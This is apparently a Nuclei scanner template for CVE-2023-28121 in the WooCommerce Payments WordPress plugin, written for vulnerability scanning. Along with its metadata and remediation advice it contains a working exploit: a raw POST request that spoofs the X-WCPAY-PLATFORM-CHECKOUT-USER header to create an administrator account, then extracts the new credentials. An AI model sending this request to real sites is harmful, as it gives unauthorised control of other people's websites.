id: CVE-2023-28121 info: name: WooCommerce Payments - Unauthorized Admin Access author: DhiyaneshDK severity: critical description: | An issue in WooCommerce Payments plugin for WordPress (versions 5.6.1 and lower) allows an unauthenticated attacker to send requests on behalf of an elevated user, like administrator. This allows a remote, unauthenticated attacker to gain admin access on a site that has the affected version of the plugin activated. remediation: | Update to the latest version of the WooCommerce Payments plugin to fix the vulnerability. reference: - https://github.com/gbrsh/CVE-2023-28121 - https://nvd.nist.gov/vuln/detail/CVE-2023-28121 - https://www.rcesecurity.com/2023/07/patch-diffing-cve-2023-28121-to-compromise-a-woocommerce/ - https://woocommerce.com/products/woocommerce-payments/ - https://developer.woocommerce.com/2023/03/23/critical-vulnerability-detected-in-woocommerce-payments-what-you-need-to-know/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-28121 cwe-id: CWE-287 epss-score: 0.75551 epss-percentile: 0.9783 cpe: cpe:2.3:a:automattic:woocommerce_payments:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: automattic product: woocommerce_payments framework: wordpress publicwww-query: /wp-content/plugins/woocommerce-payments google-query: inurl:/wp-content/plugins/woocommerce-payments tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive variables: username: "{{rand_base(6)}}" password: "{{rand_base(8)}}" email: "{{randstr}}@{{rand_base(5)}}.com" http: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} X-WCPAY-PLATFORM-CHECKOUT-USER: 1 Content-Type: application/x-www-form-urlencoded rest_route=%2Fwp%2Fv2%2Fusers&username={{username}}&email={{email}}&password={{password}}&roles=administrator matchers-condition: and matchers: - type: word part: body words: - '"registered_date":' - '"username":' - '"email":' condition: and - type: word part: header words: - application/json - type: status status: - 201 extractors: - type: dsl dsl: - '"WP_USERNAME: "+ username' - '"WP_PASSWORD: "+ password' # digest: 4a0a004730450220067714e176ab0448887551b0ba2315c1c44d7b130735fdaefbbd25394f9af35b022100cb1b99883e46ea7c4183ff13c07c6464cd7a5b4ed00f2fcf26e8cbd68aad6936:922c64590222798bb761d5b6d8e72950